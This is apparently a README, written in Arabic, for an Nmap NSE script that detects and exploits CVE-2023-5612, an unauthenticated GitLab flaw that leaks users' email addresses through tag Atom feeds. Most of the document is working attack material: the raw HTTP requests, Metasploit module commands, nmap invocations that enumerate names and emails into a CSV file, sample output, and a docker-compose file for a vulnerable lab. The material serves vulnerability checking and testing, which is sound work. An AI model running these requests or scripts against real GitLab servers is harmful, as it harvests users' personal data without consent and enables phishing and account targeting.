
Nmap NSE للتحقق من CVE-2023-5612
https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/
تم اكتشاف ثغرة في GitLab تؤثر على جميع الإصدارات قبل 16.6.6 و16.7 قبل 16.7.4 و16.8 قبل 16.8.1. كان من الممكن قراءة عنوان البريد الإلكتروني للمستخدم عبر خلاصة العلامات على الرغم من تعطيل الرؤية في ملف تعريف المستخدم. هذه مشكلة متوسطة الخطورة (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 5.3). تم تخفيفها الآن في الإصدار الأخير وتم تعيينها كـ CVE-2023-5612.
https://nvd.nist.gov/vuln/detail/CVE-2023-5612
تم اكتشاف ثغرة في GitLab تؤثر على جميع الإصدارات قبل 16.6.6 و16.7 قبل 16.7.4 و16.8 قبل 16.8.1. كان من الممكن قراءة عنوان البريد الإلكتروني للمستخدم عبر خلاصة العلامات على الرغم من تعطيل الرؤية في ملف تعريف المستخدم.
تم اكتشاف ثغرة أمنية في GitLab تسمح بالحصول على قائمة بعناوين البريد الإلكتروني للمستخدمين (وأسمائهم)، حتى إذا كان بعض المستخدمين لديهم ملفات تعريف مخفية. يحدث هذا بسبب إمكانية الوصول غير المصادق عليه إلى نقطة النهاية /api/v4/projects. لكل مشروع، يمكن الحصول على web_url وإرسال طلب إلى نقطة النهاية /-/tags?format=atom، مما يؤدي إلى الحصول على استجابة XML يظهر فيها اسم المستخدم والبريد الإلكتروني:
...
<name>test</name>
<email>[email protected]</email>
...
إثباتات المفهوم:
ملاحظة مهمة: يوجد نص NSE يُزعم أنه لهذه الثغرة، ولكن إذا تم الانتباه إلى اسمه ومحتواه - يتضح أنه خطأ ولا يتعلق بهذا CVE.
GET /api/v4/projects?output_mode=json HTTP/1.1
مثال على الاستجابة:
[{"id":3,"description":null,"name":"project3","name_with_namespace":"test / project3","path":"project3","path_with_namespace":"test/project3","created_at":"2025-09-13T16:39:05.885Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/test/project3.git","http_url_to_repo":"http://localhost:8929/test/project3.git","web_url":"http://localhost:8929/test/project3","readme_url":"http://localhost:8929/test/project3/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:39:05.885Z","namespace":{"id":4,"name":"test","path":"test","kind":"user","full_path":"test","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80\u0026d=identicon","web_url":"http://localhost:8929/test"}},{"id":2,"description":null,"name":"project2","name_with_namespace":"testgroup / project2","path":"project2","path_with_namespace":"testgroup/project2","created_at":"2025-09-13T16:35:26.979Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/testgroup/project2.git","http_url_to_repo":"http://localhost:8929/testgroup/project2.git","web_url":"http://localhost:8929/testgroup/project2","readme_url":"http://localhost:8929/testgroup/project2/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:35:26.979Z","namespace":{"id":3,"name":"testgroup","path":"testgroup","kind":"group","full_path":"testgroup","parent_id":null,"avatar_url":null,"web_url":"http://localhost:8929/groups/testgroup"}},{"id":1,"description":null,"name":"test","name_with_namespace":"Administrator / test","path":"test","path_with_namespace":"root/test","created_at":"2025-09-12T15:03:47.319Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/root/test.git","http_url_to_repo":"http://localhost:8929/root/test.git","web_url":"http://localhost:8929/root/test","readme_url":"http://localhost:8929/root/test/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:19:10.901Z","namespace":{"id":1,"name":"Administrator","path":"root","kind":"user","full_path":"root","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80\u0026d=identicon","web_url":"http://localhost:8929/root"}}]
GET /test/project3/-/tags?format=atom HTTP/1.1
GET /root/test/-/tags?format=atom HTTP/1.1
مثال على الاستجابة:
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
<title>project3 tags</title>
<link href="http://127.0.0.1:8929/test/project3/-/tags?format=atom" rel="self" type="application/atom+xml"/>
<link href="http://127.0.0.1:8929/test/project3/-/tags" rel="alternate" type="text/html"/>
<id>http://127.0.0.1:8929/test/project3/-/tags</id>
<entry>
<id>http://127.0.0.1:8929/test/project3/-/tags/1.0.0</id>
<link href="http://127.0.0.1:8929/test/project3/-/tags/1.0.0"/>
<title>1.0.0</title>
<summary></summary>
<content type="html"></content>
<media:thumbnail width="40" height="40" url="https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80&d=identicon"/>
<author>
<name>test</name>
<email>[email protected]</email>
</author>
</entry>
</feed>
في هذا الملف نرى حقول name و email لجميع مؤلفي العلامات في هذا المشروع. كشفها للمهاجم هو جوهر الثغرة.
مثال على الاستغلال الناجح:
# Metasploit
use auxiliary/gather/gitlab_tags_rss_feed_email_disclosure
set RHOSTS 127.0.0.1
set RPORT 8929
run
النتيجة:
auxiliary(gather/gitlab_tags_rss_feed_email_disclosure) > run
[*] Running module against 127.0.0.1
[+] Scraping ALL projects...
[+] name: test
[+] e-mail: [email protected]
[+] name: Administrator
[+] e-mail: [email protected]
[*] Auxiliary module execution completed
تم الاختبار على GitLab CE 16.5.10
docker-compose.ymlservices:
gitlab:
image: gitlab/gitlab-ce:16.5.10-ce.0
container_name: gitlab-ce
restart: always
hostname: 'gitlab.example.com'
environment:
GITLAB_OMNIBUS_CONFIG: |
external_url 'http://localhost:8929'
gitlab_rails['gitlab_shell_ssh_port'] = 2424
ports:
- '8929:8929'
- '443:443'
- '2424:22'
volumes:
- '$GITLAB_HOME/config:/etc/gitlab'
- '$GITLAB_HOME/logs:/var/log/gitlab'
- '$GITLAB_HOME/data:/var/opt/gitlab'
shm_size: '256m'
gitlab-ce الضعيف في docker:sudo docker compose up
sudo docker exec -it {CONTAINER_ID} grep 'Password:' /etc/gitlab/initial_root_password
# لا تقم بفك تشفير قيمة base64 المعروضة، استخدمها كما هي
# قم بتغيير بيانات اعتماد root إلى شيء مثل root:toortoor
roottest، وتسجيل الدخول كـ testtesttest# فحص كامل
nmap --script cve-2023-5612 <TARGET> -p <PORT>
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=full
# فحص سريع
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=fast
مثال على الاستغلال الناجح:
nmap -Pn --script cve-2023-5612 localhost -p 8929 --script-args check_mode=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:39 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[+] Projects found:
http://localhost:8929/test/project3
http://localhost:8929/testgroup/project2
http://localhost:8929/root/test
[+] Results:
email,username,project_url
[email protected],test,http://localhost:8929/test/project3
[email protected],Administrator,http://localhost:8929/testgroup/project2
[email protected],Administrator,http://localhost:8929/root/test
[+] Writing results to ./gitlab_enumerated.csv...
[+] Done
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
8929/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
# عرض النتائج المحفوظة، إظهار رسائل البريد الإلكتروني فقط
tail -n +2 gitlab_enumerated.csv | cut -d "," -f 1| sort -u
[email protected]
[email protected]
مثال على الاستغلال غير الناجح على خادم غير GitLab:
nmap --script cve-2023-5612 localhost -p 1337
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 06:35 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[-] Error: The target is not a GitLab instance. Exiting...
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
مثال على الاستغلال ضد هدف حقيقي غير ضعيف:
nmap -Pn -p 7180 --script cve-2023-5612 <IP-addr> --script-args check_mode=fast
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:37 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[-] Projects list seems to be empty or unavailable
[-] Target is NOT vulnerable
#############################